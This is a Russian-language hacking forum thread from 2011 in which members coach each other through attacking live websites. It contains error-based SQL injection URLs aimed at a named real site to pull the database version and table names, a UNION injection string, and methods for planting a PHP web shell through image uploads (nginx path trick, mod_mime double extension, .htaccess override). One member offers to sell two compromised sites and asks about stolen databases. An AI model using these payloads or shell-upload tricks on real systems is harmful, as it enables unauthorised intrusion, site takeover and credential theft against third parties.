Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Koren

    Koren Member

    Joined:
    11 Jul 2009
    Messages:
    66
    Likes Received:
    20
    Reputations:
    1
    вот вот про это где можно почитать, на русском

    By manipulating the HTTP verb it was possible to bypass the authorization on this directory. The scanner sent a request with POST HTTP verb and managed to bypass the authorization. An application is vulnerable to HTTP Verb tampering if the following conditions hold:

    it uses a security control that lists HTTP verbs
    the security control fails to block verbs that are not listed
    it has GET functionality that is not idempotent or will execute with an arbitrary HTTP verb

    For example, Apache with .htaccess is vulnerable if HTTP verbs are specified using the LIMIT keyword:

    является ифективным методом атаки?
     
  2. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    Если я не ошибаюсь, то эта уязвимость позволяет обходить basic-авторизацию отправляя запросы постом а не гетом.

    https://www.aspectsecurity.com/documents/Bypassing_VBAAC_with_HTTP_Verb_Tampering.pdf
     
    _________________________
    #16702 Expl0ited, 12 May 2011
    Last edited: 12 May 2011
    1 person likes this.
  3. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    638
    Likes Received:
    160
    Reputations:
    81
    Кстати, можно и так: +and+1=0+union+select+1,2,3,4,database(),6--
     
  4. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Не получается вывести версию БД.


    http://www.postyourlink.info/links10.php?new=1&catid=-52+order+by+5+--+
     
  5. raw

    raw Banned

    Joined:
    8 May 2011
    Messages:
    3
    Likes Received:
    7
    Reputations:
    1
    Code:
    http://www.postyourlink.info/links10.php?new=1&catid=52+or+1+group+by+concat((select+version()),floor(rand(0)*2))/*!having*/+min(0)+or+1--+
     
    1 person likes this.
  6. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Дальше не выводится, а где ошибка не пойму:

    http://www.postyourlink.info/links10.php?new=1&catid=52+or+1+group+by+concat((select+table_name+from+information_schema.`tables`+limit+0,1),floor(rand(0)*2))/*!having*/+min(0)+or+1+--+
     
  7. raw

    raw Banned

    Joined:
    8 May 2011
    Messages:
    3
    Likes Received:
    7
    Reputations:
    1
    Code:
    http://www.postyourlink.info/links10.php?new=1&catid=52+or+1+group+by+concat((select/*!table_name*/+from+information_schema.tables+limit+0,1),floor(rand(0)*2))/*!having*/+count(*)+or+1--+
    Ты так и будешь спрашивать каждый следующий шаг? Тогда я пожалуй катапультируюсь из данного трэда.
     
    #16707 raw, 12 May 2011
    Last edited: 13 May 2011
    2 people like this.
  8. IMMORTAL_S

    IMMORTAL_S Member

    Joined:
    29 Apr 2010
    Messages:
    129
    Likes Received:
    9
    Reputations:
    2
    Привет всем. Как вывести часть файла..? more что-то не работает.
    При cat начало не видно... большой файл.
     
  9. -=Razor=-

    -=Razor=- Member

    Joined:
    20 Dec 2008
    Messages:
    30
    Likes Received:
    29
    Reputations:
    3
    Какая именно ось?
    Пробуй less..
    Почему в уязвиостях? Или я что-то не понял? о_О
     
    1 person likes this.
  10. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886

    head, tail :)
     
    _________________________
    2 people like this.
  11. IMMORTAL_S

    IMMORTAL_S Member

    Joined:
    29 Apr 2010
    Messages:
    129
    Likes Received:
    9
    Reputations:
    2
    >Почему в уязвиостях? Или я что-то не понял? о_О
    Просто еще кое что хотел спросить... да не стал:)

    thnx.. буду вникать
     
    1 person likes this.
  12. ZARO

    ZARO Elder - Старейшина

    Joined:
    17 Apr 2009
    Messages:
    327
    Likes Received:
    129
    Reputations:
    54
    Есть слепая скуля. Вывод ошибок отключен. Не работают функции mid(),substr() и т.д. Подзапросы выполнятся успешно, а когда в скули есть mid(), substr() то запрос всегда возвращает false. Может это не mysql? И как теперь мне ее крутить если она слепая?
     
  13. zlo12

    zlo12 Elder - Старейшина

    Joined:
    28 Dec 2007
    Messages:
    535
    Likes Received:
    135
    Reputations:
    34
    Админка Indrive v4.01b поддерживает заливку jpg, jpeg, gif, png, doc, pdf, xls, zip, rar -файлов.
    Заливка шелла через картинки не получилась, как я ни старался. Реально ли залить шелл через оставшиеся форматы?
     
  14. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12

    Скорее всего, нет.
     
  15. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    Какой веб-сервер стоит?
     
    _________________________
  16. zlo12

    zlo12 Elder - Старейшина

    Joined:
    28 Dec 2007
    Messages:
    535
    Likes Received:
    135
    Reputations:
    34
    nginx/0.7.67
     
  17. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    Попробуй залить картинку с php кодом, и обратится к ней как к php скрипту, пример, картинка test.gif в неё пишешь
    PHP:
    <?php phpinfo();?>
    заливается сюда:
    Code:
    http://site.com/upload/img/test.gif
    обращаешься так
    Code:
    http://site.com/upload/img/test.gif/.php
    Подробнее: http://habrahabr.ru/blogs/sysadm/100961/
     
    _________________________
    2 people like this.
  18. zlo12

    zlo12 Elder - Старейшина

    Joined:
    28 Dec 2007
    Messages:
    535
    Likes Received:
    135
    Reputations:
    34
    Expl0ited на этом не сработало, инфа полезная, спасибо что навёл
     
  19. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Попробуй через mod_mime с подделкой content-type.
    Для FF качаешь дополнение Tamper Data. Возьми любую реальную картинку и вставь ей вконец php код. Включи Tamper Data. Отошли свою картинку и подмени имя картинки на: filename.php.jpglolo. Если включен mod_mime и кривая регулярка для проверки файла (проверит последнее вхождение .jpg и пропустит следующую приписку "lolo"), то у тебя будет работоспособный php-файл. Ничего не отрезается, т.е. обращаться по прямому пути: localhost/images/filename.php.jpglolo
    Работает из-за включенного mod_mime.
    Написал так много пунктов, потому что там может быть проверка Content-type, проверка картинки на валидность и т.д, а ты дал мало информации, ну а так наверняка.
    Если картинки чем-то сжимается на стороне сервера, то эксплуатировать не получится.

    Так же если идет фильтрация по черному списку (запрещаются всякие php, php5, phtml, etc), то можно залить .htaccess файл, который будет содержать код для выполнение картинок как php-файл.

    P.S.: Только сейчас увидел, что у тебя nginx. Под nginx не работает это. Нужен Apache.
     
    #16719 Tigger, 13 May 2011
    Last edited: 13 May 2011
    1 person likes this.
  20. zlo12

    zlo12 Elder - Старейшина

    Joined:
    28 Dec 2007
    Messages:
    535
    Likes Received:
    135
    Reputations:
    34
    Tigger идея чертовски хороша. но по ходу никак, тиц 250 и 90, могу за пару сотен отдать оба кому-нибудь. жалко выкидывать.
    и ещё один вопрос: в последнее время часто стал сталкиваться с тем, что в базах к сайтам попросту отсутсвуют логины с паролями или есть, но не подходят. Что в этих случаях делать?
     
Thread Status:
Not open for further replies.